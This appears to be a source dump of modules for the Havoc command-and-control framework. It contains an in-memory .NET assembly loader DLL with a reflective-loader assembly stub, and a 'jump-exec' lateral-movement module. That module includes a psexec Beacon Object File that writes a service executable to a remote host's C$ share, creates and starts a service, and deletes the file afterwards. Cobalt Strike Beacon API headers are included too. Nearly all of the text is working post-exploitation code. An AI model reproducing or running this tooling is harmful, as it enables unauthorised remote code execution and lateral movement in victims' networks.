-fno-asynchronous-unwind-tables -shared -masm=intel 9 | CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1 10 | CFLAGS += -s -ffunction-sections -falign-jumps=1 -w 11 | CFLAGS += -falign-labels=1 -fPIC 12 | CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup 13 | CFLAGS += -l oleaut32 -l uuid 14 | 15 | INCLUDE = -I include 16 | SOURCE = $(wildcard src/*.c) 17 | 18 | x64: 19 | nasm -f win64 src/Util.s -o src/Util.o 20 | $(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32 21 | rm src/*.o -------------------------------------------------------------------------------- /InvokeAssembly/src/DllMain.c: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | HINSTANCE hAppInstance = NULL; 11 | INSTANCE Instance = { 0 }; 12 | 13 | BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved ) 14 | { 15 | BOOL bReturnValue = TRUE; 16 | 17 | switch( dwReason ) 18 | { 19 | case DLL_QUERY_HMODULE: 20 | if( lpReserved != NULL ) 21 | *( HMODULE* ) lpReserved = hAppInstance; 22 | break; 23 | 24 | case DLL_PROCESS_ATTACH: 25 | { 26 | hAppInstance = hInstDLL; 27 | 28 | ModuleInit(); 29 | ModuleMain( lpReserved ); 30 | 31 | fflush( stdout ); 32 | ExitProcess( 0 ); 33 | } 34 | 35 | case DLL_PROCESS_DETACH: 36 | case DLL_THREAD_ATTACH: 37 | case DLL_THREAD_DETACH: 38 | break; 39 | } 40 | return bReturnValue; 41 | } 42 | 43 | VOID ModuleInit() 44 | { 45 | Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" ); 46 | if ( Instance.Modules.Msvcrt ) 47 | { 48 | Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" ); 49 | } 50 | 51 | Instance.Modules.Mscoree = LoadLibraryA( "Mscoree" ); 52 | if ( Instance.Modules.Msvcrt ) 53 | { 54 | Instance.Win32.CLRCreateInstance = GetProcAddress( Instance.Modules.Mscoree, "CLRCreateInstance" ); 55 | } 56 | } 57 | 58 | VOID ModuleMain( PVOID Params ) 59 | { 60 | PARSER Parser = { 0 }; 61 | ParserNew( &Parser, Params ); 62 | 63 | InvokeAssembly( &Parser ); 64 | } -------------------------------------------------------------------------------- /InvokeAssembly/src/InvokeAssembly.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | GUID xCLSID_CLRMetaHost = { 0x9280188d, 0xe8e, 0x4867, { 0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde } }; 4 | GUID xCLSID_CorRuntimeHost = { 0xcb2f6723, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 5 | GUID xIID_AppDomain = { 0x05F696DC, 0x2B29, 0x3663, { 0xAD, 0x8B, 0xC4, 0x38, 0x9C, 0xF2, 0xA7, 0x13 } }; 6 | GUID xIID_ICLRMetaHost = { 0xD332DB9E, 0xB9B3, 0x4125, { 0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16 } }; 7 | GUID xIID_ICLRRuntimeInfo = { 0xBD39D1D2, 0xBA2F, 0x486a, { 0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91 } }; 8 | GUID xIID_ICorRuntimeHost = { 0xcb2f6722, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 9 | 10 | BOOL FindVersion( PVOID assembly, INT length ) 11 | { 12 | PCHAR assembly_c = (char*)assembly; 13 | 14 | CHAR v4[] = { 0x76, 0x34, 0x2E, 0x30, 0x2E, 0x33, 0x30, 0x33, 0x31, 0x39 }; 15 | 16 | for ( INT i = 0; i < length; i++ ) 17 | { 18 | for ( INT j = 0; j < 10; j++ ) 19 | { 20 | if ( v4[ j ] != assembly_c[ i + j ] ) 21 | break; 22 | else 23 | { 24 | if ( j == 9 ) 25 | return 1; 26 | } 27 | } 28 | } 29 | 30 | return 0; 31 | } 32 | 33 | VOID InvokeAssembly( PPARSER DataArgs ) 34 | { 35 | SIZE_T AppDomainNameSize = 0; 36 | SIZE_T NetVersionSize = 0; 37 | SIZE_T assemblyBytesLen = 0; 38 | SIZE_T ArgumentsLen = 0; 39 | 40 | PUCHAR AppDomainName = ParserGetBytes( DataArgs, &AppDomainNameSize ); 41 | PUCHAR NetVersion = ParserGetBytes( DataArgs, &NetVersionSize ); 42 | PUCHAR assemblyBytes = ParserGetBytes( DataArgs, &assemblyBytesLen ); 43 | PUCHAR Arguments = ParserGetBytes( DataArgs, &ArgumentsLen ); 44 | 45 | WCHAR wAppDomainName[ MAX_PATH ] = { 0 }; 46 | WCHAR wNetVersion[ 20 ] = { 0 }; 47 | PWCHAR wArguments = LocalAlloc( LPTR, ArgumentsLen * sizeof( WCHAR ) ); 48 | 49 | // CLR & .Net Instances 50 | ICLRMetaHost* pClrMetaHost = { NULL }; 51 | ICLRRuntimeInfo* pClrRuntimeInfo = { NULL }; 52 | ICorRuntimeHost* pICorRuntimeHost = { NULL }; 53 | Assembly* pAssembly = { NULL }; 54 | IUnknown* pAppDomainThunk = { NULL }; 55 | AppDomain* pAppDomain = { NULL }; 56 | MethodInfo* pMethodInfo = { NULL }; 57 | VARIANT vtPsa = { 0 }; 58 | LPVOID pvData = { NULL }; 59 | 60 | VARIANT retVal = { 0 }; 61 | VARIANT obj = { 0 }; 62 | 63 | 64 | // Convert Ansi Strings to Wide Strings 65 | CharStringToWCharString( wAppDomainName, AppDomainName, AppDomainNameSize ); 66 | CharStringToWCharString( wNetVersion, NetVersion, NetVersionSize ); 67 | CharStringToWCharString( wArguments, Arguments, ArgumentsLen ); 68 | 69 | if ( assemblyBytes == NULL ) 70 | return; 71 | 72 | // Hosting CLR 73 | if ( ! W32CreateClrInstance( wNetVersion, &pClrMetaHost, &pClrRuntimeInfo, &pICorRuntimeHost ) ) 74 | { 75 | Instance.Win32.printf( "[-] Couldn't start CLR \n" ); 76 | return; 77 | } 78 | 79 | SAFEARRAYBOUND rgsabound[1] = { 0 }; 80 | rgsabound[0].cElements = assemblyBytesLen; 81 | rgsabound[0].lLbound = 0; 82 | SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound); 83 | 84 | if ( pICorRuntimeHost->lpVtbl->CreateDomain( pICorRuntimeHost, wAppDomainName, NULL, &pAppDomainThunk ) != S_OK ) 85 | goto Cleanup; 86 | 87 | if ( pAppDomainThunk->lpVtbl->QueryInterface( pAppDomainThunk, &xIID_AppDomain, &pAppDomain ) != S_OK ) 88 | goto Cleanup; 89 | 90 | if ( SafeArrayAccessData( pSafeArray, &pvData ) != S_OK ) 91 | goto Cleanup; 92 | 93 | MemCopy(pvData, assemblyBytes, assemblyBytesLen); 94 | 95 | if ( SafeArrayUnaccessData( pSafeArray ) != S_OK ) 96 | Instance.Win32.printf("[-] SafeArrayUnaccessData: Failed\n"); 97 | 98 | if ( pAppDomain->lpVtbl->Load_3( pAppDomain, pSafeArray, &pAssembly ) != S_OK ) 99 | goto Cleanup; 100 | 101 | if ( pAssembly->lpVtbl->EntryPoint( pAssembly, &pMethodInfo ) != S_OK ) 102 | goto Cleanup; 103 | 104 | obj.vt = VT_NULL; 105 | 106 | SAFEARRAY* psaStaticMethodArgs = SafeArrayCreateVector( VT_VARIANT, 0, 1 ); //Last field -> entryPoint == 1 is needed if Main(String[] args) 0 if Main() 107 | 108 | DWORD argumentCount; 109 | LPWSTR* argumentsArray = CommandLineToArgvW( wArguments, &argumentCount ); 110 | 111 | argumentsArray++; 112 | argumentCount--; 113 | 114 | vtPsa.vt = ( VT_ARRAY | VT_BSTR ); 115 | vtPsa.parray = SafeArrayCreateVector( VT_BSTR, 0, argumentCount ); 116 | 117 | for ( INT i = 0; i <= argumentCount; i++ ) 118 | SafeArrayPutElement( vtPsa.parray, &i, SysAllocString( argumentsArray[ i ] ) ); 119 | 120 | long idx[1] = { 0 }; 121 | SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa); 122 | 123 | if ( pMethodInfo->lpVtbl->Invoke_3( pMethodInfo, obj, psaStaticMethodArgs, &retVal ) != S_OK ) 124 | goto Cleanup; 125 | 126 | 127 | 128 | Cleanup: 129 | if ( NULL != psaStaticMethodArgs ) 130 | { 131 | SafeArrayDestroy( psaStaticMethodArgs ); 132 | psaStaticMethodArgs = NULL; 133 | } 134 | 135 | if ( pMethodInfo != NULL ) 136 | { 137 | pMethodInfo->lpVtbl->Release( pMethodInfo ); 138 | pMethodInfo = NULL; 139 | } 140 | 141 | if ( pAssembly != NULL ) 142 | { 143 | pAssembly->lpVtbl->Release( pAssembly ); 144 | pAssembly = NULL; 145 | } 146 | 147 | if (pAppDomain != NULL) 148 | { 149 | pAppDomain->lpVtbl->Release( pAppDomain ); 150 | pAppDomain = NULL; 151 | } 152 | 153 | if ( pAppDomainThunk != NULL ) 154 | pAppDomainThunk->lpVtbl->Release( pAppDomainThunk ); 155 | 156 | if ( pICorRuntimeHost != NULL ) 157 | { 158 | pICorRuntimeHost->lpVtbl->UnloadDomain( pICorRuntimeHost, pAppDomainThunk ); 159 | pICorRuntimeHost->lpVtbl->Stop( pICorRuntimeHost ); 160 | pICorRuntimeHost = NULL; 161 | } 162 | 163 | if ( pClrRuntimeInfo != NULL ) 164 | { 165 | pClrRuntimeInfo->lpVtbl->Release( pClrRuntimeInfo ); 166 | pClrRuntimeInfo = NULL; 167 | } 168 | 169 | if ( pClrMetaHost != NULL ) 170 | { 171 | pClrMetaHost->lpVtbl->Release( pClrMetaHost ); 172 | pClrMetaHost = NULL; 173 | } 174 | } 175 | 176 | BOOL W32CreateClrInstance( LPCWSTR dotNetVersion, PICLRMetaHost *ppClrMetaHost, PICLRRuntimeInfo *ppClrRuntimeInfo, ICorRuntimeHost **ppICorRuntimeHost ) 177 | { 178 | BOOL fLoadable = FALSE; 179 | 180 | if ( Instance.Win32.CLRCreateInstance( &xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, ppClrMetaHost ) == S_OK ) 181 | { 182 | if ( ( *ppClrMetaHost )->lpVtbl->GetRuntime( *ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo ) == S_OK ) 183 | { 184 | if ( ( ( *ppClrRuntimeInfo )->lpVtbl->IsLoadable( *ppClrRuntimeInfo, &fLoadable ) == S_OK ) && fLoadable ) 185 | { 186 | //Load the CLR into the current process and return a runtime interface pointer. -> CLR changed to ICor which is deprecated but works 187 | if ( ( *ppClrRuntimeInfo )->lpVtbl->GetInterface( *ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, ppICorRuntimeHost ) == S_OK ) 188 | { 189 | //Start it. This is okay to call even if the CLR is already running 190 | ( *ppICorRuntimeHost )->lpVtbl->Start( *ppICorRuntimeHost ); 191 | } 192 | else 193 | { 194 | Instance.Win32.printf("[-] ( GetInterface ) Process refusing to get interface of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 195 | return 0; 196 | } 197 | } 198 | else 199 | { 200 | Instance.Win32.printf("[-] ( IsLoadable ) Process refusing to load %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 201 | return 0; 202 | } 203 | } 204 | else 205 | { 206 | Instance.Win32.printf("[-] ( GetRuntime ) Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 207 | return 0; 208 | } 209 | } 210 | else 211 | { 212 | Instance.Win32.printf("[-] ( CLRCreateInstance ) Process refusing to create %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 213 | return 0; 214 | } 215 | 216 | return 1; 217 | } -------------------------------------------------------------------------------- /InvokeAssembly/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( parser == NULL ) 10 | return; 11 | 12 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 13 | 14 | parser->buffer = buffer + sizeof( UINT32 ); 15 | parser->original = buffer; 16 | parser->length = Size - sizeof( UINT32 ); 17 | } 18 | 19 | INT32 ParserGetInt32( PPARSER parser ) 20 | { 21 | INT32 intBytes = 0; 22 | 23 | if ( parser->length < 4 ) 24 | return 0; 25 | 26 | memcpy( &intBytes, parser->buffer, 4 ); 27 | 28 | parser->buffer += 4; 29 | parser->length -= 4; 30 | 31 | return ( INT ) intBytes; 32 | } 33 | 34 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 35 | { 36 | UINT32 length = 0; 37 | PCHAR outdata = NULL; 38 | 39 | if ( parser->length < 4 ) 40 | return NULL; 41 | 42 | memcpy( &length, parser->buffer, 4 ); 43 | parser->buffer += 4; 44 | 45 | outdata = parser->buffer; 46 | if ( outdata == NULL ) 47 | return NULL; 48 | 49 | parser->length -= 4; 50 | parser->length -= length; 51 | parser->buffer += length; 52 | 53 | if ( size != NULL ) 54 | *size = length; 55 | 56 | return outdata; 57 | } -------------------------------------------------------------------------------- /InvokeAssembly/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /InvokeAssembly/src/Win32.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed) 5 | { 6 | INT Length = MaximumAllowed; 7 | 8 | while (--Length >= 0) 9 | { 10 | if (!(*Destination++ = *Source++)) 11 | return MaximumAllowed - Length - 1; 12 | } 13 | 14 | return MaximumAllowed - Length; 15 | } -------------------------------------------------------------------------------- /Jump-exec/DCOM/dcom.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/DCOM/dcom.x86.o -------------------------------------------------------------------------------- /Jump-exec/Psexec/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /Jump-exec/Psexec/makefile: -------------------------------------------------------------------------------- 1 | BOF := psexec 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o $(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded $(BOF).x64.o 10 | $(CC_x86) -o $(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded $(BOF).x86.o 12 | 13 | clean: 14 | rm $(BOF).o -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | /* Havoc console output modes */ 5 | #define HAVOC_CONSOLE_GOOD 0x90 6 | #define HAVOC_CONSOLE_INFO 0x91 7 | #define HAVOC_CONSOLE_ERRO 0x92 8 | 9 | /* Defines */ 10 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA( 11 | LPCSTR lpFileName, 12 | DWORD dwDesiredAccess, 13 | DWORD dwShareMode, 14 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 15 | DWORD dwCreationDisposition, 16 | DWORD dwFlagsAndAttributes, 17 | HANDLE hTemplateFile 18 | ); 19 | 20 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile( 21 | HANDLE hFile, 22 | LPCVOID lpBuffer, 23 | DWORD nNumberOfBytesToWrite, 24 | LPDWORD lpNumberOfBytesWritten, 25 | LPOVERLAPPED lpOverlapped 26 | ); 27 | 28 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA( 29 | LPCSTR lpMachineName, 30 | LPCSTR lpDatabaseName, 31 | DWORD dwDesiredAccess 32 | ); 33 | 34 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA( 35 | SC_HANDLE hSCManager, 36 | LPCSTR lpServiceName, 37 | LPCSTR lpDisplayName, 38 | DWORD dwDesiredAccess, 39 | DWORD dwServiceType, 40 | DWORD dwStartType, 41 | DWORD dwErrorControl, 42 | LPCSTR lpBinaryPathName, 43 | LPCSTR lpLoadOrderGroup, 44 | LPDWORD lpdwTagId, 45 | LPCSTR lpDependencies, 46 | LPCSTR lpServiceStartName, 47 | LPCSTR lpPassword 48 | ); 49 | 50 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA( 51 | SC_HANDLE hService, 52 | DWORD dwNumServiceArgs, 53 | LPCSTR* lpServiceArgVectors 54 | ); 55 | 56 | 57 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle( SC_HANDLE hSCObject ); 58 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService( SC_HANDLE hService ); 59 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(); 60 | WINBASEAPI VOID WINAPI KERNEL32$CloseHandle( HANDLE Handle ); 61 | WINBASEAPI BOOL WINAPI KERNEL32$DeleteFileA( LPCSTR lpFileName ); 62 | /* psexec entrypoint code */ 63 | VOID go( PVOID Buffer, ULONG Length ) 64 | { 65 | datap Parser = { 0 }; 66 | DWORD SvcBinarySize = 0; 67 | DWORD Written = 0; 68 | PCHAR Host = NULL; 69 | PCHAR SvcName = NULL; 70 | PCHAR SvcBinary = NULL; 71 | PCHAR SvcPath = NULL; 72 | BOOL Success = FALSE; 73 | 74 | HANDLE hFile = NULL; 75 | HANDLE hSvcManager = NULL; 76 | HANDLE hSvcService = NULL; 77 | 78 | /* Prepare our argument buffer */ 79 | BeaconDataParse( &Parser, Buffer, Length ); 80 | 81 | /* Parse our arguments */ 82 | Host = BeaconDataExtract( &Parser, NULL ); 83 | SvcName = BeaconDataExtract( &Parser, NULL ); 84 | SvcBinary = BeaconDataExtract( &Parser, &SvcBinarySize ); 85 | SvcPath = BeaconDataExtract( &Parser, NULL ); 86 | 87 | // BeaconPrintf( HAVOC_CONSOLE_GOOD, "Psexec [Host: %s] [SvcName: %s] [SvcPath: %s]", Host, SvcName, SvcPath ); 88 | 89 | /* Upload service file to target machine (overwrite existing file)*/ 90 | hFile = KERNEL32$CreateFileA( SvcPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); 91 | if ( hFile == INVALID_HANDLE_VALUE ) 92 | { 93 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateFileA Failed: %d", KERNEL32$GetLastError() ); 94 | goto EXIT; 95 | } 96 | 97 | if ( ! KERNEL32$WriteFile( hFile, SvcBinary, SvcBinarySize, &Written, NULL ) ) 98 | { 99 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "WriteFile Failed: %d", KERNEL32$GetLastError() ); 100 | goto EXIT; 101 | } 102 | 103 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Dropped service executable on %s at %s", Host, SvcPath ); 104 | 105 | /* Close the file */ 106 | KERNEL32$CloseHandle( hFile ); 107 | hFile = NULL; 108 | 109 | /* Open Service manager. Create and start our service. The magic happens here :P */ 110 | // NOTE: OpenSCManagerA is going to use SERVICES_ACTIVE_DATABASE by default if lpDatabaseName == NULL. 111 | hSvcManager = ADVAPI32$OpenSCManagerA( Host, NULL, SC_MANAGER_ALL_ACCESS ); 112 | if ( ! hSvcManager ) 113 | { 114 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "OpenSCManagerA Failed: %d", KERNEL32$GetLastError() ); 115 | goto EXIT; 116 | } 117 | 118 | hSvcService = ADVAPI32$CreateServiceA( hSvcManager, SvcName, NULL, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcPath, NULL, NULL, NULL, NULL, NULL ); 119 | if ( ! hSvcService ) 120 | { 121 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateServiceA Failed: %d", KERNEL32$GetLastError() ); 122 | goto EXIT; 123 | } 124 | 125 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Starting Service executable..." ); 126 | 127 | // TODO: check if service is dead after starting it. maybe we trying to start a buggy one... 128 | // TODO: add check for ERROR_SERVICE_REQUEST_TIMEOUT 129 | if ( ! ADVAPI32$StartServiceA( hSvcService, 0, NULL ) ) 130 | { 131 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "CreateServiceA Failed: %d", KERNEL32$GetLastError() ); 132 | goto EXIT; 133 | } 134 | 135 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Successful started Service executable" ); 136 | 137 | if ( ! KERNEL32$DeleteFileA( SvcPath ) ) 138 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "Failed to delete service executable %s from %s Error:[%d]", SvcPath, Host, KERNEL32$GetLastError() ); 139 | else 140 | BeaconPrintf( HAVOC_CONSOLE_INFO, "Deleted service executable %s from %s", SvcPath, Host ); 141 | 142 | Success = TRUE; 143 | 144 | EXIT: 145 | if ( hFile ) 146 | { 147 | KERNEL32$CloseHandle( hFile ); 148 | hFile = NULL; 149 | } 150 | 151 | if ( ! ADVAPI32$DeleteService( hSvcService ) ) 152 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "Failed to delete Service %s on %s: %d", SvcName, Host, KERNEL32$GetLastError() ); 153 | 154 | if ( hSvcService ) 155 | { 156 | ADVAPI32$CloseServiceHandle( hSvcService ); 157 | hSvcService = NULL; 158 | } 159 | 160 | if ( hSvcManager ) 161 | { 162 | ADVAPI32$CloseServiceHandle( hSvcManager ); 163 | hSvcManager = NULL; 164 | } 165 | 166 | if ( Success ) 167 | BeaconPrintf( HAVOC_CONSOLE_GOOD, "psexec successful executed on %s", Host ); 168 | else 169 | BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execut on %s", Host ); 170 | } 171 | -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 4 | def psexec( demonID, *param ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer : Packer = Packer() 8 | 9 | Host : str = "" 10 | SvcName : str = "" 11 | SvcPath : str = "" 12 | SvcBinary : bytes = b'' 13 | 14 | demon = Demon( demonID ) 15 | 16 | if len(param) < 3: 17 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 18 | return False 19 | 20 | if len(param) > 3: 21 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many arguments" ) 22 | return False 23 | 24 | Host = param[ 0 ] 25 | SvcName = param[ 1 ] 26 | SvcPath = param[ 2 ] 27 | 28 | if exists( SvcPath ) is False: 29 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Service executable not found: {SvcPath}" ) 30 | return False 31 | else: 32 | SvcBinary = open( SvcPath, 'rb' ).read() 33 | if len(SvcBinary) == 0: 34 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Specified service executable is empty" ) 35 | return False 36 | 37 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to execute {SvcPath} on {Host} using psexec" ) 38 | 39 | packer.addstr( Host ) 40 | packer.addstr( SvcName ) 41 | packer.addstr( SvcBinary ) 42 | packer.addstr( "\\\\" + Host + "\\C$\\Windows\\" + SvcName + ".exe" ) 43 | 44 | demon.InlineExecute( TaskID, "go", f"psexec.{demon.ProcessArch}.o", packer.getbuffer(), False ) 45 | 46 | return TaskID 47 | 48 | RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) 49 | RegisterCommand( psexec, "jump-exec", "psexec", "executes specified service on target host ", 0, "[Host] [Service Name] [Local Path]", "DOMAIN-DC AgentSvc /tmp/MyAgentSvc.exe" ) 50 | -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/Psexec/psexec.x64.o -------------------------------------------------------------------------------- /Jump-exec/Psexec/psexec.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/Psexec/psexec.x86.o -------------------------------------------------------------------------------- /Jump-exec/ScShell/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | 